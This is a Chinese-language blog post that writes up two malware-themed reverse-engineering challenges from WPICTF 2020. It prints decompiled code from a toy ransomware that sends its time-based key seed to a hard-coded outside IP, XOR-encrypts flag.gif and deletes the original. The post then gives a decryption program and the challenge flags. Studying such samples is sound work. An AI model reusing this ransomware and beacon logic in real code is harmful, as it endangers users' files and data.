<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head>
    <meta charset="utf-8">
<title>WPICTF-re-wp - rr&#39;s blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">








    <meta name="description" content="这次的比赛只有两道re，全都是malware，不难，也还挺有意思">
<meta property="og:type" content="article">
<meta property="og:title" content="WPICTF-re-wp">
<meta property="og:url" content="http://blog.rycbar.club/2020/04/20/WPICTF-re-wp/index.html">
<meta property="og:site_name" content="rr&#39;s blog">
<meta property="og:description" content="这次的比赛只有两道re，全都是malware，不难，也还挺有意思">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://blog.rycbar.club/2020/04/20/WPICTF-re-wp/flag.gif">
<meta property="article:published_time" content="2020-04-20T10:06:44.000Z">
<meta property="article:modified_time" content="2020-04-20T14:26:14.000Z">
<meta property="article:author" content="Aorui Zhang">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="WPICTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://blog.rycbar.club/2020/04/20/WPICTF-re-wp/flag.gif">





<link rel="icon" href="rust.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/github.min.css">


<link rel="stylesheet" href="/css/style.css">


<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    
    
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-128484503-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-128484503-1');
</script>


    


<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="rr's blog" type="application/atom+xml">
</head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt="" height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item "
               href="/archives">Archives</a>
            
            <a class="navbar-item "
               href="/categories">Categories</a>
            
            <a class="navbar-item "
               href="/tags">Tags</a>
            
            <a class="navbar-item "
               href="/links">Links</a>
            
            <a class="navbar-item "
               href="/about">About</a>
            
            <a class="navbar-item "
               href="/atom.xml">RSS</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Search" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            <div class="navbar-item is-hoverable has-dropdown is-hidden-mobile is-hidden-tablet-only toc">
                <a class="navbar-item" title="Table of Contents">
                    <i class="fa fa-list"></i>
                </a>
                <div class="navbar-dropdown is-right">
                    
                    
                    
                    
                    <a class="navbar-item" href="#danger-Live-and-Malicious-Code">1&nbsp;&nbsp;<b>danger-Live-and-Malicious-Code</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#NotWannasigh">2&nbsp;&nbsp;<b>NotWannasigh</b></a>
                    
                </div>
            </div>
            
            
            <a class="navbar-item" title="GitHub" target="_blank" rel="noopener" href="https://github.com/rycbar77">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            WPICTF-re-wp
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            
                <time datetime="2020-04-20T10:06:44.000Z" itemprop="datePublished">Apr 20 2020</time>
            
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/ctf/">ctf</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            5 minutes read (About 675 words)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <html><head></head><body><p>这次的比赛只有两道re，全都是malware，不难，也还挺有意思</p>
<span id="more"></span>

<h4 id="danger-Live-and-Malicious-Code"><a href="#danger-Live-and-Malicious-Code" class="headerlink" title="danger-Live-and-Malicious-Code"></a>danger-Live-and-Malicious-Code</h4><p>病毒的代码里面混进了flag，js的语法也不是特别懂，发现了很多处理字符串的函数，所以干脆<code>console.log</code>都输出了出来，发现输出的<code>url</code>中间夹了flag</p>
<figure class="highlight dust hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-xml">WPI</span><span class="hljs-template-variable">{Oh_nose_procoding_detected}</span></span><br></pre></td></tr></tbody></table></figure>



<h4 id="NotWannasigh"><a href="#NotWannasigh" class="headerlink" title="NotWannasigh"></a>NotWannasigh</h4><p>首先看下<code>ransom note</code></p>
<figure class="highlight pgsql hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Haha! Your precious file flag.gif has been <span class="hljs-keyword">encrypted</span> <span class="hljs-keyword">by</span> my <span class="hljs-built_in">new</span> <span class="hljs-keyword">and</span> improved ransomware NotWannasigh! You must send bitcoin <span class="hljs-keyword">to</span> "bitpay.com/83768" <span class="hljs-keyword">to</span> <span class="hljs-keyword">get</span> the decryption key. You should act fast because <span class="hljs-keyword">in</span> <span class="hljs-number">48</span> hours I will <span class="hljs-keyword">delete</span> the key. Muahahahaha!</span><br><span class="line"> - def-<span class="hljs-keyword">not</span>-h4ckah</span><br><span class="line"></span><br><span class="line">(Hi, CTF challenge creator here. You should _NEVER_ pay the ransom. <span class="hljs-keyword">If</span> you send bitcoin <span class="hljs-keyword">to</span> that BTC wallet <span class="hljs-keyword">then</span> you will <span class="hljs-keyword">ONLY</span> be donating <span class="hljs-keyword">to</span> charity (<span class="hljs-keyword">and</span> hey, that<span class="hljs-string">'s really nice of you, Mental Health Hackers is a great organization). I will NOT send you the decryption key)</span></span><br></pre></td></tr></tbody></table></figure>

<p>题目中所给的<code>flag-gif.EnCiPhErEd</code>应该就是加密过的文件，解密就可以得到flag，给的流量包暂时不知道作用是什么，干脆先看看程序的实现</p>
<figure class="highlight c++ hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">*(_QWORD *)seed = <span class="hljs-built_in">time</span>(<span class="hljs-number">0LL</span>);</span><br><span class="line">  <span class="hljs-built_in">srand</span>(seed[<span class="hljs-number">0</span>]);</span><br><span class="line">  fd = <span class="hljs-built_in">socket</span>(<span class="hljs-number">2</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);</span><br><span class="line">  <span class="hljs-keyword">if</span> ( fd == <span class="hljs-number">-1</span> )</span><br><span class="line">  {</span><br><span class="line">    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"could not create socket"</span>);</span><br><span class="line">  }</span><br><span class="line">  <span class="hljs-keyword">else</span></span><br><span class="line">  {</span><br><span class="line">    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"created socket"</span>);</span><br><span class="line">    *(_DWORD *)&amp;addr.sa_data[<span class="hljs-number">2</span>] = <span class="hljs-built_in">inet_addr</span>(<span class="hljs-string">"108.61.127.136"</span>);</span><br><span class="line">    addr.sa_family = <span class="hljs-number">2</span>;</span><br><span class="line">    *(_WORD *)addr.sa_data = <span class="hljs-built_in">htons</span>(<span class="hljs-number">0x50</span>u);</span><br><span class="line">    <span class="hljs-keyword">if</span> ( <span class="hljs-built_in">connect</span>(fd, &amp;addr, <span class="hljs-number">0x10</span>u) &gt;= <span class="hljs-number">0</span> )</span><br><span class="line">    {</span><br><span class="line">      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"connected"</span>);</span><br><span class="line">      <span class="hljs-built_in">sprintf</span>(&amp;s, <span class="hljs-string">"%d"</span>, *(_QWORD *)seed);</span><br><span class="line">      <span class="hljs-keyword">if</span> ( <span class="hljs-built_in">send</span>(fd, &amp;s, <span class="hljs-number">0xA</span>uLL, <span class="hljs-number">0</span>) &gt;= <span class="hljs-number">0</span> )</span><br><span class="line">        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"sent"</span>);</span><br><span class="line">      <span class="hljs-keyword">else</span></span><br><span class="line">        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"send failed"</span>);</span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-keyword">else</span></span><br><span class="line">    {</span><br><span class="line">      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"connect error"</span>);</span><br><span class="line">    }</span><br><span class="line">  }</span><br></pre></td></tr></tbody></table></figure>

<p>先根据当前时间生成了一个随机数种子，然后进行通信，把这个种子发给了一个ip，这个种子肯定是后面生成随机数用的，所以肯定是有用的，这也就是流量包的作用，根据流量信息可以获得这个随机数种子的值<code>1585599106</code></p>
<p>下面生成了一个随机数序列</p>
<figure class="highlight c++ hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-built_in">puts</span>(<span class="hljs-string">"targetting flag.gif"</span>);</span><br><span class="line">stream = <span class="hljs-built_in">fopen</span>(<span class="hljs-string">"flag.gif"</span>, <span class="hljs-string">"r+"</span>);</span><br><span class="line"><span class="hljs-built_in">fseek</span>(stream, <span class="hljs-number">0LL</span>, <span class="hljs-number">2</span>);</span><br><span class="line">v19 = <span class="hljs-built_in">ftell</span>(stream);</span><br><span class="line"><span class="hljs-built_in">fseek</span>(stream, <span class="hljs-number">0LL</span>, <span class="hljs-number">0</span>);</span><br><span class="line"><span class="hljs-built_in">printf</span>(<span class="hljs-string">"fileSize = %d\n"</span>, (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)v19);</span><br><span class="line">v18 = v19 - <span class="hljs-number">1LL</span>;</span><br><span class="line">v8 = v19;</span><br><span class="line">v9 = <span class="hljs-number">0LL</span>;</span><br><span class="line">v3 = <span class="hljs-built_in">alloca</span>(<span class="hljs-number">16</span> * ((v19 + <span class="hljs-number">15LL</span>) / <span class="hljs-number">0x10</span>uLL));</span><br><span class="line">v17 = &amp;v6;</span><br><span class="line"><span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i &lt; v19; ++i )</span><br><span class="line">  *((_BYTE *)v17 + i) = <span class="hljs-built_in">rand</span>();</span><br><span class="line"><span class="hljs-built_in">puts</span>(<span class="hljs-string">"key generated by 256"</span>);</span><br></pre></td></tr></tbody></table></figure>

<p>生成了key，下面是加密过程</p>
<figure class="highlight c++ hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">for</span> ( j = <span class="hljs-number">0</span>; ; ++j )</span><br><span class="line">  {</span><br><span class="line">    v14 = <span class="hljs-built_in">fgetc</span>(stream);</span><br><span class="line">    <span class="hljs-keyword">if</span> ( j &gt;= v19 )</span><br><span class="line">      <span class="hljs-keyword">break</span>;</span><br><span class="line">    *((_BYTE *)v15 + j) = v14 ^ *((_BYTE *)v17 + j);</span><br><span class="line">  }</span><br><span class="line">  <span class="hljs-built_in">fclose</span>(stream);</span><br><span class="line">  <span class="hljs-built_in">remove</span>(<span class="hljs-string">"flag.gif"</span>);</span><br><span class="line">  v13 = <span class="hljs-built_in">fopen</span>(<span class="hljs-string">"flag-gif.EnCiPhErEd"</span>, <span class="hljs-string">"w+"</span>);</span><br><span class="line">  <span class="hljs-keyword">for</span> ( k = <span class="hljs-number">0</span>; k &lt; v19; ++k )</span><br><span class="line">    <span class="hljs-built_in">fputc</span>(*((<span class="hljs-keyword">unsigned</span> __int8 *)v15 + k), v13);</span><br><span class="line">  <span class="hljs-built_in">fclose</span>(v13);</span><br></pre></td></tr></tbody></table></figure>

<p>简单异或之后写入文件，所以生成随机数序列之后再异或回来就好了</p>
<figure class="highlight c++ hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;cstdio&gt;</span></span></span><br><span class="line"><span class="hljs-keyword">using</span> <span class="hljs-keyword">namespace</span> std;</span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>{</span><br><span class="line">    <span class="hljs-built_in">srand</span>(<span class="hljs-number">1585599106</span>);</span><br><span class="line">    FILE *s = <span class="hljs-built_in">fopen</span>(<span class="hljs-string">"../flag-gif.EnCiPhErEd"</span>, <span class="hljs-string">"r"</span>);</span><br><span class="line">    <span class="hljs-keyword">int</span> index = <span class="hljs-number">0</span>;</span><br><span class="line">    FILE *f = <span class="hljs-built_in">fopen</span>(<span class="hljs-string">"../flag.gif"</span>, <span class="hljs-string">"w+"</span>);</span><br><span class="line">    <span class="hljs-keyword">while</span> (!<span class="hljs-built_in">feof</span>(s))</span><br><span class="line">    {</span><br><span class="line">        <span class="hljs-keyword">int</span> uVar1 = <span class="hljs-built_in">rand</span>()&amp;<span class="hljs-number">0xff</span>;</span><br><span class="line">        <span class="hljs-keyword">int8_t</span> tmp2=<span class="hljs-built_in">fgetc</span>(s);</span><br><span class="line">        <span class="hljs-keyword">int8_t</span> tmp = uVar1 ^ tmp2;</span><br><span class="line">        <span class="hljs-built_in">fputc</span>(tmp, f);</span><br><span class="line">        index = (<span class="hljs-keyword">int32_t</span>)index + <span class="hljs-number">1</span>;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-built_in">fclose</span>(s);</span><br><span class="line">    <span class="hljs-built_in">fclose</span>(f);</span><br><span class="line">    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>这个脚本要在linux下跑，因为win的随机数生成的不一样</p>
<p>得到了含有flag的gif</p>
<p><img src="/2020/04/20/WPICTF-re-wp/flag.gif" alt="flag"></p>
<p>flag有点难读，第一遍还读错了一位</p>
<figure class="highlight autohotkey hljs"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">WPI{It_always_feels_<span class="hljs-built_in">a_little</span>_weird_writing_malware}</span><br></pre></td></tr></tbody></table></figure>

</body></html>
    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/writeup/">#writeup</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/ctf/">#ctf</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/WPICTF/">#WPICTF</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2020/05/06/linux-%E9%A9%B1%E5%8A%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">linux 驱动学习笔记</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2020/04/01/Fibonacci-JavisOJ-wp/">Fibonacci-JavisOJ-wp</a>
            
        </span>
    </div>
    
</article>


<div class="sharebox">
    
<div class="sharethis-inline-share-buttons"></div>
<script type='text/javascript' src='https://platform-api.sharethis.com/js/sharethis.js#property=618a5a31fe4ac40012aea77e&amp;product=inline-share-buttons' async='async'></script>

</div>



<div class="comments">
    <h3 class="title is-4">Comments</h3>
    
<script>
    var disqus_config = function () {
        this.page.url = 'http://blog.rycbar.club/2020/04/20/WPICTF-re-wp/';
        this.page.identifier = '2020/04/20/WPICTF-re-wp/';
        
        this.language = 'en';
        
    };
    (function() {
        var d = document, s = d.createElement('script');  
        s.src = '//' + 'rrblog-2' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>

<div id="disqus_thread">
    
    <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
</div>

    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2023 Aorui Zhang&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a
                        target="_blank" rel="noopener" href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" target="_blank" rel="noopener" href="https://github.com/rycbar77">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" target="_blank" rel="noopener" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("en-AU");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery > p > .gallery-item').unwrap();
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    
    

    



<script src="/js/script.js"></script>


    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Type something..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>

<script src="/js/insight.js"></script>

    
</body>
</html>